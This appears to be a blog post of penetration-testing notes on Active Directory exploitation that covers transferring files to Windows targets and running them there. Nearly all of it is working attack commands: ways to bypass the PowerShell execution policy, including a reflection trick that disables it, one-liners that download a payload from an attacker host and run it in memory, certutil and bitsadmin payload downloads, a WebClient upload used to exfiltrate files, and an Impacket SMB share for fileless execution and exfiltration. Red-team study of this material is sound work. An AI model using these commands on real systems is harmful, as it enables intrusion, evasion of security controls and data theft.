← Back to Blog

AD Exploitation: File Transfer and Execution

Type: Technical Notes Category: Active Directory
File Transfer PowerShell SMB Exfiltration Windows

PowerShell File Download & Execution

Binary or script execution via PowerShell is crucial to exploitation of AD environments, as is the ability to transfer files to the target machine.

Check Execution Policy:

Get-ExecutionPolicy

Enable PowerShell with Bypass:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

PowerShell Invoke Commands

Get-Content .file_to_execute.ps1 | Invoke-Expression

GC .file_to_execute.ps1 | iex

PowerShell.exe -ExecutionPolicy Bypass -File .file_to_execute.ps1

PowerShell.exe -ExecutionPolicy UnRestricted -File .file_to_execute.ps1

Set-ExecutionPolicy Bypass -Scope Process

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

Disable Execution Policy via Function:

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}  Disable-ExecutionPolicy  .file_to_execute.ps1

Bypassing Policy via Piping

Echo Write-Host "script" | PowerShell.exe -noprofile -

Get-Content .file_to_execute.ps1 | PowerShell.exe -noprofile -

Using type (Windows equivalent of cat):

type .runme.ps1 | PowerShell.exe -noprofile -

Download and Execute from Remote Server

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://ip/payload.ps1')"

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/payload.exe', 'payload.exe')

Upload/Exfiltration:

powershell (New-Object System.Net.WebClient).UploadFile('http://ip/file_to_extract.txt', 'file_to_extract.txt')

Combined Method:

powershell -executionpolicy bypass IEX(New-Object Net.WebClient).downloadString('http://ip/payload.ps1')

Other Native Windows Methods

certutil.exe

certutil.exe -urlcache -split -f http://ip/payload.exe payload.exe

bitsadmin.exe

bitsadmin.exe /transfer mydownloadjob /download /priority high http://ip/payload.exe payload.exe

SMB File Transfer

SMB is an extremely useful method of file transfer for both Windows and Linux targets. One of the strongest advantages of SMB is the ability to run payloads without the files ever touching the disk while also not using HTTP methods of download, which may be blocked or heavily filtered.

Impacket SMB Server

Start SMB Server:

impacket-smbserver share_name $(pwd) -smb2support -user username -password password

Connect from Target (PowerShell/Evil-WinRM):

$pass = convertto-securestring 'password' -AsPlainText -Force;
$cred = New-Object System.Management.Automation.PSCredential('username', $pass);
New-PSDrive -Name username -PSProvider FileSystem -Credential $cred -Root \\ip\share_name;

List Share Contents:

dir \\ip\share_name

Download File from Share:

copy \\ip\share_name\file_to_extract.txt file_to_extract.txt

Upload File to Share:

copy file_to_extract.txt \\ip\share_name\file_to_extract.txt

Other Methods

  • ftp
  • tftp
  • mshta
  • rundll32
  • php
  • socat
  • netcat

Useful Resources